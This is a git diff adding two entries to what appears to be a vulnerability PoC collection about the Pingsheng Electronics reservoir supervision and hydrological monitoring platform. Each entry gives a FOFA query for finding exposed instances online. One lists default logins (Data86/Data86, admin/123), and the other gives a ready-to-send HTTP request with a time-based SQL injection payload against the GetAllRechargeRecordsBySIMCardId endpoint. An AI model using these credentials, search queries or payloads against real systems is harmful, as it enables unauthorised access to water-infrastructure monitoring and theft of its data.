整理文件

平升电子水库监管平台/平升水库水文监测系统默认密码.md

@@ -0,0 +1,16 @@
+## 平升水库水文监测系统默认密码
+
+## fofa
+
+```
+body="js/PSExtend.js"
+```
+
+## poc
+
+```
+Data86/Data86
+admin/123
+```
+
+![image-20240619111253661](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406191112776.png)

平升电子水库监管平台/平升电子水库监管平台GetAllRechargeRecordsBySIMCardId接口处存在SQL注入漏洞.md

@@ -0,0 +1,23 @@
+## 平升电子水库监管平台GetAllRechargeRecordsBySIMCardId接口处存在SQL注入漏洞
+
+平升电子水库监管平台GetAllRechargeRecordsBySIMCardId接口处存在SQL注入漏洞，攻击者未经授权可以访问数据库中的数据，从而盗取用户数据，造成用户信息泄露。
+
+## fofa
+
+```
+"js/PSExtend.js"
+```
+
+## poc
+
+```
+POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1
+Host: your-ip
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
+Accept-Encoding: gzip, deflate
+
+loginIdentifer=&simcardId=';WAITFOR DELAY '0:0:5'--
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407050910230.png)